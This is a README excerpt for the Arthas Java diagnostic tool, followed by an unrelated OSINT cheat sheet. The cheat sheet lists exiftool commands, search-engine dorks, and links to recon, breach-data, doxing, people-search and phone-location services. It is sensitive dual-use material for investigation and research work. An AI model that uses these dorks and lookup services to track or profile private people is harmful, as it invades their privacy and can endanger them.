org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110) ... at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451) at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1121) at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637) at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:745) ``` #### Trace See what is slowing down your method invocation with trace command: ![trace](site/src/site/sphinx/_static/trace.png) #### Watch Watch the first parameter and thrown exception of `test.arthas.TestWatch#doGet` only if it throws exception. ``` $ watch test.arthas.TestWatch doGet {params[0], throwExp} -e Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 65 ms. ts=2018-09-18 10:26:28;result=@ArrayList[ @RequestFacade[org.apache.catalina.connector.RequestFacade@79f922b2], @NullPointerException[java.lang.NullPointerException], ] ``` #### Monitor Monitor a specific method invocation statistics, including total number of invocations, average response time, success rate, every 5 seconds: ``` $ monitor -c 5 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 109 ms. timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:32 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.67 0.00% timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:37 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 1.00 0.00% timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:42 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.43 0.00% ``` #### Time Tunnel(tt) Record method invocation data, so that you can check the method invocation parameters, returned value and thrown exception later. It works as if you could come back and replay the past method invocation via time tunnel. ``` $ tt -t org.apache.dubbo.demo.provider.DemoServiceImpl sayHello Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 75 ms. INDEX TIMESTAMP COST(ms) IS-RET IS-EXP OBJECT CLASS METHOD ------------------------------------------------------------------------------------------------------------------------------------- 1000 2018-09-20 09:54:10 1.971195 true false 0x55965cca DemoServiceImpl sayHello 1001 2018-09-20 09:54:11 0.215685 true false 0x55965cca DemoServiceImpl sayHello 1002 2018-09-20 09:54:12 0.236303 true false 0x55965cca DemoServiceImpl sayHello 1003 2018-09-20 09:54:13 0.159598 true false 0x55965cca DemoServiceImpl sayHello 1004 2018-09-20 09:54:14 0.201982 true false 0x55965cca DemoServiceImpl sayHello 1005 2018-09-20 09:54:15 0.214205 true false 0x55965cca DemoServiceImpl sayHello 1006 2018-09-20 09:54:16 0.241863 true false 0x55965cca DemoServiceImpl sayHello 1007 2018-09-20 09:54:17 0.305747 true false 0x55965cca DemoServiceImpl sayHello 1008 2018-09-20 09:54:18 0.18468 true false 0x55965cca DemoServiceImpl sayHello ``` #### Classloader ``` $ classloader name numberOfInstances loadedCountTotal BootstrapClassLoader 1 3346 com.taobao.arthas.agent.ArthasClassloader 1 1262 java.net.URLClassLoader 2 1033 org.apache.catalina.loader.ParallelWebappClassLoader 1 628 sun.reflect.DelegatingClassLoader 166 166 sun.misc.Launcher$AppClassLoader 1 31 com.alibaba.fastjson.util.ASMClassLoader 6 15 sun.misc.Launcher$ExtClassLoader 1 7 org.jvnet.hk2.internal.DelegatingClassLoader 2 2 sun.reflect.misc.MethodUtil 1 1 ``` #### Web Console * https://alibaba.github.io/arthas/en/web-console ![web console](site/src/site/sphinx/_static/web-console-local.png) ### Credit * [greys-anatomy](https://github.com/oldmanpushcart/greys-anatomy): The Arthas code base has derived from Greys, we thank for the excellent work done by Greys. * [termd](https://github.com/termd/termd): Arthas's terminal implementation is based on termd, an open source library for writing terminal applications in Java. * [crash](https://github.com/crashub/crash): Arthas's text based user interface rendering is based on codes extracted from [here](https://github.com/crashub/crash/tree/1.3.2/shell) * [cli](https://github.com/eclipse-vertx/vert.x/tree/master/src/main/java/io/vertx/core/cli): Arthas's command line interface implementation is based on cli, open sourced by vert.x
# OSINT CHEAT SHEET - List OSINT Tools [![Github Badge](https://img.shields.io/badge/-Jieyab89-black?style=flat&logo=github&logoColor=white&link=https://github.com/Jieyab89/)](https://github.com/Jieyab89) Contains a list of OSINT tools, OSINT tips, datasets, Maltego transform and others. There are free and paid tools you can use and owner is not responsible, only for knowledge or educational purposes. Sorry if some of the resources have closed the service or error owner doesn't always check what's going on with the resources here, thank you # EXIF TOOL COMMAND #Exif tag name and data type > Artist string > > Author string > > Caption string > > Categories string > > Collections string > > DateTime date > > DPP lang-alt > > EditStatus string > > FixtureIdentifier string > > Keywords string > > Notes string > > ObjectCycle string > > OriginatingProgram string > > Rating real > > Rawrppused boolean > > ReleaseDate string > > ReleaseTime string > > RPP lang-alt > > Snapshots string > > Tagged boolean More : man exiftool (Run on your terminal) Site : - [Exiftool](https://exiftool.org/) - [List tagname](https://exiftool.org/TagNames/) - [List tagnme 2](https://metacpan.org/dist/Image-ExifTool/view/lib/Image/ExifTool/TagNames.pod) - [List tagname 3](https://manpages.org/imageexiftooltagnames/3) #Write metadata - exiftool -tagname="string" file > >example : exiftool -Author="Bayu" test.txt > you can add multiple tag and multiple file #Delete metadata - exiftool -tagname="" file > >example : exiftool -Author="" test.txt > #Delete mass metadata - exiftool -all="" file > >example : exiftool -all="" file > #Usage : man exiftool or read documentation exiftool.org > Not there are tag no writetable, make sure tagname can write > #!Note > Use fresh file, if your file has been compressed or edit metadata you got a default metadata > You can use xmp format for edit, write and delete metadata > Check the documentation # SOCMINT - [Instagram](https://github.com/Datalux/Osintgram) Be carefull using this tool - [Tinfoleak](https://github.com/vaguileradiaz/tinfoleak) - [SOCMINT tool](https://osint.support/chrome-extensions/2019/09/29/osint-socmint-tooling.html) - [Graph Search](http://socmint.tools/graph.htm) # Collection Dataset - [Kaggle](https://www.kaggle.com/) - [AWS open data](https://registry.opendata.aws/) - [Open Network](http://www.opendatanetwork.com/) - [WHO Data](https://www.who.int/data/gho/) # Forums - [Bellingcat Discord](https://discord.com/invite/nTaNPmz) - [Independent OSINT](https://discord.com/invite/2DGJ2EC) - [OSINT.Team](https://osint.team) - [Seccodeid](https://forum.seccodeid.com/category/osint) - [/r/OSINT](https://www.reddit.com/r/OSINT) - [TraceLabs Slack](https://discord.gg/tracelabs) # General Search - [ASK](http://www.ask.com) - [Baidu](http://www.baidu.com) - [DuckDuckGo](https://duckduckgo.com) - [Yandex](https://www.yandex.com) - [Infospace](http://www.infospace.com) # Meta Search - [100SearchEngines](https://www.100searchengines.com) - [Bing vs. Google](http://bvsg.org) - [DADgogo](http://dadgogo.com) - [Etools](http://www.etools.ch) - [WebCrawler](http://www.webcrawler.com) # Code Search - [Chromium Code Search](https://source.chromium.org/chromium) - [Android Code Search](https://cs.android.com) - [Code Finder](http://codefinder.org) - [CodeSeek](https://www.codeseek.co) - [Debian Code Search](http://codesearch.debian.net) - [Scala](https://www.programcreek.com/scala) - [SearchCode](https://searchcode.com) - [SourceCodeOnline](http://www.sourcecodeonline.com) - [Woboq](https://code.woboq.org) # Competitive Programming - [Hackerrank](https://www.hackerrank.com/) - [Code chef](https://www.codechef.com/) - [Code war](https://www.codewars.com/) # File & FTP - [Archie](http://archie.icm.edu.pl/archie_eng.html) - [4shared](https://www.4shared.com) - [FileSearching](http://www.filesearching.com) - [File chef](https://www.filechef.com) - [Global File Search](http://globalfilesearch.com) - [Search Shared](https://www.searchshared.info) - [MMNT](http://www.mmnt.ru) # Social Media Search and Monitoring - [Awario](https://awario.com) - [Brand24](https://brand24.com) - [Samdesk](https://www.samdesk.io) - [Social Links](https://www.mtg-bi.com) - [Social Searcher](https://www.social-searcher.com/) - [Social Analyzer](https://github.com/qeeqbox/social-analyzer) # Social Media Management and Content Discovery - [Buffer](https://buffer.com) - [Coosto](https://www.coosto.com) - [Revive Social](https://revive.social) - [Social Analyzer](https://github.com/qeeqbox/social-analyzer) # Web Intelligence - [Better Whois](http://www.betterwhois.com) - [DNS History](http://dnshistory.org) - [DNS Spy](https://dnsspy.io) - [DNS Checker](https://dnschecker.org) - [HackerTarget](https://hackertarget.com/ip-tools) - [Shodan](https://www.shodan.io) - [Wappalyzer](https://www.wappalyzer.com/) - [Sudomy](https://github.com/screetsec/Sudomy) - [Testssl](https://testssl.sh/) - [Nmap](https://nmap.org/) - [builtwith](https://builtwith.com/) - [VirusTotal](https://www.virustotal.com/gui/) - [Nessus](https://www.tenable.com/products/nessus) - [Nikto](https://cirt.net/Nikto2) - [Webshag](https://github.com/wereallfeds/webshag) - [wayback machine](https://archive.org/web/) - [Farsight DNSDB Transforms for Maltego](https://www.maltego.com/transform-hub/farsight-dnsdb/) - [Web Screnshhot Maltego Transforms](https://github.com/TURROKS/Maltego_Web2Screenshot) - [Nuclei](https://github.com/projectdiscovery/nuclei) # Analysing URLs - [Unfurl](https://github.com/obsidianforensics/unfurl) - [VirusTotal](https://www.virustotal.com/gui/home/upload) - [Archive Org](https://archive.org/web/) - [Iplocation](https://iplocation.io/website-link-analyzer) - [Smallseotools](https://smallseotools.com/website-link-analyzer-tool/) - [Abuse IP](https://www.abuseipdb.com/) - [Check Phish](https://checkphish.ai/) - [Radar By Cloudflare](https://radar.cloudflare.com/) - [Is it Phishing](https://isitphishing.org/) - [Kaspersky](https://opentip.kaspersky.com/) - [PolySwarm](https://polyswarm.network/) - [Threat Miner](https://www.threatminer.org/) # Researching Cyber Threats - [Apility.io](https://apility.io) - [Alien Vault](https://otx.alienvault.com) - [AutoShun](https://www.autoshun.org) - [Blacklist Check Tool](http://www.blchecktool.com) - [Censys](https://censys.io) - [CVE Details](https://www.cvedetails.com) - [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com) - [JoeSandbox Cloud](https://www.joesandbox.com) - [Is It Hacked?](http://www.isithacked.com) - [Is It Phishing](https://isitphishing.org) - [Kaspersky Threat](https://opentip.kaspersky.com) - [Malware Domain List](http://www.malwaredomainlist.com/mdl.php) - [Malware URL Website](https://www.malwareurl.com/listing-urls.php) - [Quttera](https://quttera.com) - [Virus total](https://www.virustotal.com/gui/home/upload) - [Virus Share](https://virusshare.com) - [Web Cookies Scanner](https://webcookies.org) - [Yara](https://yara.readthedocs.io/en/stable/) - [Spiderfoot](https://www.spiderfoot.net/) - [NVD](https://nvd.nist.gov/search) - [Seclist](https://seclists.org/fulldisclosure/) - [CVE Mitre](https://cve.mitre.org/cve/search_cve_list.html) - [Malicious Check](https://forum.seccodeid.com/d/phishing-email-analysis-tools) - [Email Header Analysis](https://mxtoolbox.com/EmailHeaders.aspx) - [Url Scan]( https://urlscan.io/ ) - [AnyRun](https://any.run/) - [Hybrid Analysis](https://www.hybrid-analysis.com/) - [VMRay Sandbox](https://www.vmray.com/) - [Browser Sandbox](https://www.browserling.com/) - [Fillter Bypass](https://www.filterbypass.me/id) - [Abuse IP DB](https://www.abuseipdb.com/) - [Talos CTI](https://www.talosintelligence.com/) - [Phishing Analysis Tool](https://www.phishtool.com/) - [Phish Verification System](https://phishtank.org/) - [PolySwarm](https://www.maltego.com/transform-hub/polyswarm/) - [ThreatCrowd](https://www.maltego.com/transform-hub/threatcrowd/) - [HYAS Insight](https://www.maltego.com/transform-hub/hyas-insight/) - [Phishstats](https://phishstats.info/) - [GitGuardian](https://www.gitguardian.com/monitor-public-github-for-secrets) - [Rescure](https://rescure.me/feeds.html) - [Kaspersky](https://opentip.kaspersky.com/) - [PolySwarm](https://polyswarm.network/) - [Darkfeed](https://darkfeed.io/) # IoT Search Engines - [LeakIX](https://leakix.net) - [Binary Edge](https://www.binaryedge.io) - [Shodan](https://www.shodan.io) - [Shodan Filters](https://github.com/T43cr0wl3r/shodan-filters) - [Shodan Scripts](https://github.com/random-robbie/My-Shodan-Scripts) # IP Addresses - [Whats my ip](https://whatismyipaddress.com/) This tools can show your ip address isp provider - [Ip 2 location](https://www.ip2location.com/) This tools can show your ip address isp provider and geo location # Wireless Network - [Wigle](https://www.wigle.net/) Maps and database of 802.11 wireless networks, with statistics, submitted by wardrivers, netstumblers, and net huggers - [Fing Net Scan](https://www.fing.com/) - [Wifianalyzer](https://www.wifianalyzer.info/) - [Signalmonitoring](https://signalmonitoring.com/) - [Angry Ip](https://angryip.org/) - [Advanced ip scanner](https://www.advanced-ip-scanner.com/) - [Wifimap](https://www.wifimap.io/) - [Fon](https://fon.com/maps/) - [SolarWInds](https://www.solarwinds.com/network-performance-monitor/use-cases/wifi-monitor) # SOC & Threat Hunting - [Alien Vault](https://otx.alienvault.com/) - [Exploit db](https://www.exploit-db.com/) - [AT&T](https://cybersecurity.att.com/resource-center#content_analyst-reports) - [Yara](https://yara.readthedocs.io/en/stable/) - [Virustotal](https://www.virustotal.com/gui/home/upload) - [Joesandbox](https://www.joesandbox.com/#windows) - [Spiderfoot](https://www.spiderfoot.net/) - [Open CTI](https://github.com/OpenCTI-Platform/opencti) - [Solarwinds](https://www.solarwinds.com/) - [VMware Carbon Black Endpoint](https://www.vmware.com/products/carbon-black-cloud-endpoint.html) - [Insightidr](https://www.rapid7.com/products/insightidr/) - [MISP](https://www.misp-project.org/) - [NVD](https://nvd.nist.gov/search) - [Seclist](https://seclists.org/fulldisclosure/) - [CVE Mitre](https://cve.mitre.org/cve/search_cve_list.html) - [Whois Record](https://centralops.net/co/) - [Abuse IP DB](https://www.abuseipdb.com/) - [Talos CTI](https://www.talosintelligence.com/) - [Darkfeed](https://darkfeed.io/) Tips You can find the file hash or other threat indicator # Dorking Dorking is a wonderful thing, you can use this technique to search for anything such as index of a website, looking for live online camera server and other specifics, as for dorking commands that you can do for example 1. intitle: Search for specific titles 2. inurl: Search for specific urls or paths 3. intext: Search for specific words or contects 4. filetype: Search for files 5. site: Search from a specified target 6. Wildcard or symbol * (star) Find all web pages, for example: seccodeid* 7. Define:term Search for all things with specified terms, example define:seccodeid 8. cache page Take a snapshot of an indexed page. Google uses this to find the right page for the query you're looking for. Website or target specifically 9. allintext: Searches for specific text contained on a web page 10. allinurl: Find various keywords in a URL 11. allintitle: Restricts results to those containing all terms specified in a title 12. link: List of web pages that have links to the specified URL 13. (|) Pipe. This is a logical operator, | "tips" will show all the sites which contain either, or both words 14. (+) Used to concatenate words, useful to detect pages that use more than one specific key 15. (-) Minus operator avoids showing results that contain certain words, e.g. security -trails will show pages that use "security" in their text, but not those that have the word "trails" example > intext:"hacking" site:seccodeid.com > site:www.github.com ext:doc | ext:docx | ext:odt | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv # Google Advanced Search Tools - [Advanced google search](https://www.google.com/advanced_search) - [Google Scholar](https://scholar.google.com) - [Google Alerts](https://www.google.com/alerts) - [Google Search History](https://myactivity.google.com/myactivity) # Other Search Engines - [us.searchboth.net](http://us.searchboth.net) - [Archive.org](http://www.arhive.org) - [Yandex](Yandex.com) - [Pastebin](http://www.pastebin.com) - [Topix.com](http://www.topix.com) - [search.carrot2.org/stable/search](http://search.carrot2.org/stable/search) - [Shodan](https://www.shodan.io/) - [Piratebays](https://thepiratebays.com/) - [Onesearch](https://www.onesearch.com/) - [Searchencrypt](https://www.searchencrypt.com/home) - [Duckgo](https://duckduckgo.com/) - [Waymore](https://forum.seccodeid.com/d/waymore-find-way-more-from-the-wayback-machine) # Internet Archive - [Wayback Machine](https://web.archive.org/) - [Intelligence X](https://intelx.io/) - [Openlibrary](https://openlibrary.org/) - [Archive Fo](https://archive.fo/) - [UKWA](https://www.webarchive.org.uk/ukwa/) - [Archive today](https://archive.vn/) - [Waymore](https://forum.seccodeid.com/d/waymore-find-way-more-from-the-wayback-machine) # Data Breached OSINT - [Dehashed](https://www.dehashed.com/) - [Haveibeenpwned](https://haveibeenpwned.com/) - [Intelligence X](https://intelx.io/) - [Wiki Leaks](https://wikileaks.org/) - [DDO Secrets](https://ddosecrets.com/wiki/Distributed_Denial_of_Secrets) - [Breached](https://breached.to/) Availabe on Darkweb - [Dark Tracer](https://darktracer.com/) - [Doxbin](https://doxbin.com/) # Crack Jurnals - [SCI HUB](https://sci-hub.hkvisa.net/) This domain will always change # Search Jurnals - [Libgen](https://libgen.is/) - [Ieee](https://ieeexplore.ieee.org/Xplore/home.jsp) - [Sciencedirect](https://www.sciencedirect.com/) - [Sinta](https://sinta.kemdikbud.go.id/) - [Scopus](https://www.scopus.com/) - [Onesearch ID](https://onesearch.id/) # Blogs Search Engine - [Google Blog](www.google.com/blogsearch) - [technorati](www.technorati.com) - [omgili.com](http://omgili.com/) # Darkweb Search Engines - [Thehiddenwiki](http://thehiddenwiki.org) - [Onion Link](http://www.onion.link) - [MEMEX](https://memex.garden/) - [Onion](https://onion.cab) - [Onion city](https://onion.city/) - [Ahmia](https://ahmia.fi/) - [TorBot](https://github.com/DedSecInside/TorBot) - [Darkfeed](https://darkfeed.io/) # Tracking Website Changes - [Changedetection](http://www.changedetection.com) - [Followthatpage](http://www.followthatpage.com) # Company Reconnaissance Sites (Passive) - [whois](http://www.whois.net) - [Netcraft](http://www.netcraft.com) - [Hunter](https://hunter.io/) - [SignalHire](https://www.signalhire.com/) # People Searching - [spokeo](http://www.spokeo.com) - [123people](http://www.123people.com) - [peepdb](http://www.peepdb.com) - [reversegeni](http://www.reversegenie.com/plate.php) - [PDDIKTI](https://pddikti.kemdikbud.go.id/) - [SINTA](https://sinta.kemdikbud.go.id/) - [Social Searcher](https://www.social-searcher.com/) - [Pimeyes](https://pimeyes.com/en) - [Rocketreach](https://rocketreach.co/) - [SignalHire](https://www.signalhire.com/) - [Doxbin](https://doxbin.com/) # Phone Numbers - [argali](http://www.argali.com) - [ciddb](http://www.ciddb.com/index.php) - [cellrevealer](http://www.cellrevealer.com) - [spydialer](http://www.spydialer.com) - [Twilio](https://www.twilio.com/lookup) - [Reverse lookup](https://www.reversephonelookup.com/) - [PhoneInfoga](https://github.com/sundowndev/PhoneInfoga) - [Sync](https://sync.me/) - [National cell](https://www.nationalcellulardirectory.com/) - [Getcontact](https://www.getcontact.com/id/) - [Moriarty-Project](https://github.com/AzizKpln/Moriarty-Project) - [Get Contact](https://www.getcontact.com/en/) - [True Caller](https://www.truecaller.com/) - [Cell Id Lookup](https://www.reskrim.com/cek.php) - [Device Info](https://www.deviceinfo.me/) - [Cell Finder](https://cellidfinder.com/) - [Unkownphone](https://www.unknownphone.com/) - [Whocallsme](https://whocallsme.com/) - [elenchitelefonici](https://www.elenchitelefonici.it/) - [nationalcellulardirectory](https://www.nationalcellulardirectory.com/) - [phonebooks](https://www.phonebooks.com/) - [International Phone Directories](https://www.thisnumber.com/) - [PhoneInfoga](https://demo.phoneinfoga.crvx.fr/#/) - [Spy Dialer](https://spydialer.com/) - [Phone Validator](https://www.phonevalidator.com/) - [Fone finder](https://www.fonefinder.net/) - [411 reverse phone](https://www.411.com/reverse-phone) - [Number guru](https://www.numberguru.com/) - [Zaba reverse phone](https://www.zabasearch.com/reverse-phone-lookup/) - [FullContact](https://www.maltego.com/transform-hub/full-contact/) - [HLR Lookup](https://www.hlrlookup.com/) - [Ceebydith HLR Lookup](https://ceebydith.com/cek-hlr-lokasi-hp.html) - [Free HLR](https://www.free-hlr.com/) - [HLR Lookup API](https://www.hlr-lookups.com/) - [Maltego Phone Search](https://www.maltego.com/transform-hub/phonesearch/) - [SignalHire](https://www.signalhire.com/) - [Emobiletracker](https://www.emobiletracker.com/) - [OpenCNAM](https://docs.maltego.com/support/solutions/articles/15000045282-maltego-opencnam-transforms) - [Fullcontact](https://www.fullcontact.com/) - [seon](https://seon.io/resources/the-ultimate-guide-to-free-email-lookup-and-reverse-email-lookup-tools/) # Public Records - [Public Record](http://publicrecords.searchsystems.net) - [Fam Watchdog](http://Familywatchdog.us) - [Crime Reports](http://www.crimereports.com) # Finding Usernames - [Namechk](http://www.namechk.com) - [Knowem](http://www.knowem.com) - [Nexfil](https://github.com/thewhiteh4t/nexfil) - [Sherlock](https://github.com/sherlock-project/sherlock) - [Instantusername](https://instantusername.com/#/) - [Snitch](http://snitch.name/) - [Checkusernames](https://checkusernames.com/) - [Maigret](https://github.com/soxoj/maigret) # Social Networks - [Facebook](https://facebook.com/livemap) - [Facebook lookup id](https://lookup-id.com/#) - [Sherlock](https://github.com/sherlock-project/sherlock) - [Socialsearcher Users](https://www.social-searcher.com/) - [Sherlock](https://github.com/sherlock-project/sherlock) - [Nexfil](https://github.com/thewhiteh4t/nexfil) - [Googlesocialsearch](https://www.social-searcher.com/google-social-search/) - [Google Social Network Transforms](https://www.maltego.com/transform-hub/google-programmable-search-engine-transforms/) - [FullContact](https://www.maltego.com/transform-hub/full-contact/) - [maigret](https://github.com/soxoj/maigret) # Google Queries for Facebook > Group Search: site:facebook.com inurl:group > > Group Wall Posts Search: site:facebook.com inurl:wall > > Pages Search: site:facebook.com inurl:pages > > Public Profiles: allinurl: people ‘‘name’’ site:facebook.com > # Facebook Query Language (FQL) - [Findmyfbid](http://www.findmyfbid.com/) > Photos By - https://www.facebook.com/search/taget_id/photos-by > > Photos Liked - https://www.facebook.com/search/taget_id/photos-liked > > Photos Of - https://www.facebook.com/search/taget_id/photos-of > > Comments - https://www.facebook.com/search/taget_id/photos-commented > > Friends - https://www.facebook.com/search/taget_id/friends > > Videos Tagged - https://www.facebook.com/search/taget_id/videos > > Videos By - https://www.facebook.com/search/taget_id/videos-by > > Videos Liked - https://www.facebook.com/search/taget_id/videos-liked > > Videos Commented - https://www.facebook.com/search/taget_id/videos-commented > > Events Attended - https://www.facebook.com/search/taget_id/events-joined > > Relatives - https://www.facebook.com/search/taget_id/relatives > or you can use dork for spesific example > id <this id facebook> site:facebook.com > > page site: facebook.com > > id <this id facebook> site:facebook.com * > > page site: facebook.com * > # The Ultimate Facebook Investigation Tool - [Intel Technique](https://inteltechniques.com/osint/facebook.html) - [DumpItBlue](http://le-tools.com/DumpItBlue.html) - [Fanpage Karma](http://www.fanpagekarma.com) - [Facebook Search](http://search.fb.com/) - [Fb-sleep-stats](https://github.com/sqren/fb-sleep-stats) - [Lookup-ID.com](https://lookup-id.com) - [SearchIsBack](https://searchisback.com) - [Wolfram Alpha Facebook Report](http://www.wolframalpha.com/input/?i=facebook+report) # Instagram - [Hashtagify](http://hashtagify.me) - [Iconosquare](http://iconosquare.com) - [Picodash](https://www.picodash.com) - [Toutatis](https://github.com/megadose/toutatis) - [SearchMyBio](https://www.searchmy.bio/) - [Dumpor](https://dumpor.com/) - [Hookgram](https://hookgram.com/) # Pinterest - [Pingroupie](http://pingroupie.com) # Twitter - [search.twitter.com](https://twitter.com/search-home) - [twitter advanced](https://www.twitter.com/search-advanced) - [twitter who_to_follow](https://www.twitter.com/who_to_follow) - [Backtweets](http://backtweets.com) BackTweets is a Twitter analytics tool that allows users to search through a Tweet archive. - [First Tweet](http://ctrlq.org/first) - [Foller.me](http://foller.me) - [Followerwonk](http://followerwonk.com) - [GeoSocial Footprint](http://geosocialfootprint.com) - [Gigatweeter](http://gigatweeter.com) - [Harvard TweetMap](http://worldmap.harvard.edu/tweetmap) - [Hashtagify](http://hashtagify.me) - [Hashtags.org](http://www.hashtags.org) - [MyTweetAlerts](https://www.mytweetalerts.com/) A tool to create custom email alerts based on Twitter search. - [OneMillionTweetMap](http://onemilliontweetmap.com) - [SnapBird](http://snapbird.org) - [Social Bearing](http://www.socialbearing.com) - [Social Rank First Follower](http://socialrank.com/firstfollower) - [Spoonbill](http://spoonbill.io) - [Tagdef](https://tagdef.com) - [TeachingPrivacy](http://app.teachingprivacy.com) - [Tinfoleak](https://tinfoleak.com) - [Trends24](http://trends24.in) - [TrendsMap](http://trendsmap.com) - [Ttrends](https://ttrends.co) - [twbirthday](http://twbirthday.com) - [TwChat](http://twchat.com) - [tweepsect](http://tweepsect.com) - [TweetArchivist](http://www.tweetarchivist.com) - [TweetDeck](https://www.tweetdeck.com) - [Tweeten](http://tweeten.xyz) - [TweetMap](http://mapd.csail.mit.edu/tweetmap) - [TweetMap](http://worldmap.harvard.edu/tweetmap) - [TweetPsych](http://tweetpsych.com) - [Tweetreach](http://tweetreach.com) - [TweetStats](http://www.tweetstats.com) - [TweetTunnel](http://tweettunnel.com) - [Twellow](http://www.twellow.com) - [Tweriod](http://www.tweriod.com) - [Twiangulate](http://www.twiangulate.com) - [Twilert](http://www.twilert.com) - [Twipho](http://www.twipho.net) - [Twitonomy](http://www.twitonomy.com) - [TwitRSS](https://twitrss.me) - [Twitter Advanced Search](https://twitter.com/search-advanced?lang=en) - [Twitter Audit](https://www.twitteraudit.com) - [Twitter Chat Schedule](http://tweetreports.com/twitter-chat-schedule) - [Twitter Counter](http://twittercounter.com) - [Twitterfall](http://twitterfall.com) - [Twitter Search](http://search.twitter.com) - [TWUBS Twitter Chat](http://twubs.com/twitter-chats) - [Schedule Warble](https://warble.co) - [Twint](https://github.com/twintproject/twint) # Twitter Search Engines - [tweetpaths](http://www.tweetpaths.com) - [allmytweets](http://www.allmytweets.com) - [Twimemachine](https://www.twimemachine.com) - [inteltechniques](http://inteltechniques.com/osint/twitter.html) # LinkedIn Google queries for LinkedIn > Public Profiles: site:linkedin.com inurl:pub > > Updated Profiles: site:linkedin.com inurl:updates > > Company Profiles: site:linkedin.com inurl:companies > - [LinkedInDumper](https://github.com/l4rm4nd/LinkedInDumper) # MySpace Google queries for MySpace > Profiles: site: myspace.com inurl:profile > > Blogs: site:myspace.com inurl:blogs > > Videos: site:myspace.com inurl:vids > > Jobs: site:myspace.com inurl:jobs > > Videos: site:myspace.com ‘‘TARGET NAME’’ ‘‘videos’’ > > Comments: site:myspace.com ‘‘TARGET NAME’’ ‘‘comments’’ > > Friends: site:myspace.com ‘‘TARGET NAME’’ ‘‘friends’’ > # Tiktok - [tiktok-hashtag-analysis](https://github.com/bellingcat/tiktok-hashtag-analysis) # Social Network Search Engines - [socialmention](http://www.socialmention.com) # Monitoring & Alerting - [Pastebin Alerts](http://pastebin.com/u/alerts) - [HaveIBeenPwned](http://www.haveIbeenpwned.com) - [breachorclear](http://breachorclear.jesterscourt.cc) # EXIF Analysis - [regex](http://regex.info/exif.cgi) - [FindExif](http://www.findexif.com) - [metapicz](http://metapicz.com) - [imageforensic](http://www.imageforensic.org) - [metapicz](http://metapicz.com) - [jimpl](https://jimpl.com/) - [pic2map](https://www.pic2map.com/) # Documents - [Metashield Analyzer](https://metashieldanalyzer.elevenpaths.com/) - [foca](https://github.com/ElevenPaths/FOCA) - [Psbdmp](https://psbdmp.ws/) - [Find PDF Doc](http://www.findpdfdoc.com/) # Email Tracing - [ip-adress](http://www.ip-adress.com/trace_email/) - [whatismyipaddress](http://www.whatismyipaddress.com/trace-email) - [hunter](https://hunter.io/) - [email-checker](https://email-checker.net/) - [verifyemailaddress](https://www.verifyemailaddress.org/) - [SignalHire](https://www.signalhire.com/) - [Holehe](https://github.com/megadose/holehe) - [Holehe Maltego Transforms](https://github.com/megadose/holehe-maltego) - [Spokeo](https://www.spokeo.com/email-search) - [Mx Toolbox - Header Email](https://mxtoolbox.com/EmailHeaders.aspx) - [getnotify](http://www.getnotify.com) - [epieos](https://epieos.com/) - [seon](https://seon.io/resources/the-ultimate-guide-to-free-email-lookup-and-reverse-email-lookup-tools/) # IoT – Internet of Things - [Cameraftp](https://www.cameraftp.com/cameraftp/publish/publishedcameras.aspx) - [Earthcam](https://www.earthcam.com/) - [Insecam](http://Insecam.org) - [Shodan](https://Shodan.io) # Shodan Query Options > https://pen-testing.sans.org/blog/2015/12/08/effective-shodan-searches > > https://danielmiessler.com/study/shodan/#gs.VBVsyo0 > # Capturing Information - [DownloadHelper](https://www.downloadhelper.net/) Firefox plugin that will assist in downloading all media from a website - [Exif Viewer](https://addons.mozilla.org/en-US/firefox/addon/exif-viewer/) - [HTTrack](https://www.httrack.com/) - [Wayback Machine](https://archive.org/web/) # OSINT TOOLS - [bbot](https://github.com/blacklanternsecurity/bbot) - [Meta OSINT](https://metaosint.github.io/) - [Shrelock](https://github.com/sherlock-project/sherlock) - [Maltego](https://www.maltego.com/) - [OSINT Framework](https://osintframework.com/) - [Creepy](https://www.geocreepy.com/) - [Twint](https://forum.seccodeid.com/d/twint-twitter-intelligence-tool) - [Telegram OSINT](https://forum.seccodeid.com/d/telegram-nearby-map) - [Recon-Ng](https://github.com/lanmaster53/recon-ng) - [Metagoofil](https://www.kali.org/tools/metagoofil/) - [tinfoleak](https://github.com/vaguileradiaz/tinfoleak) - [maigret](https://github.com/soxoj/maigret) - [mosint](https://github.com/alpkeskin/mosint) - [osint_stuff_tool_collection](https://github.com/cipher387/osint_stuff_tool_collection) - [instaloctrack](https://github.com/bernsteining/instaloctrack) - [SpyScrap](https://github.com/RuthGnz/SpyScrap) - [osintteye](https://github.com/rlyonheart/osinteye) - [metagofil](https://github.com/kurobeats/metagoofil) - [recon-ng](https://github.com/lanmaster53/recon-ng) - [Harvester](https://github.com/laramies/theHarvester) - [Geo creepy](http://www.geocreepy.com/) - [trape](https://github.com/jofpin/trape) - [ReconDog](https://github.com/s0md3v/ReconDog) - [iKy](https://github.com/kennbroorg/iKy) - 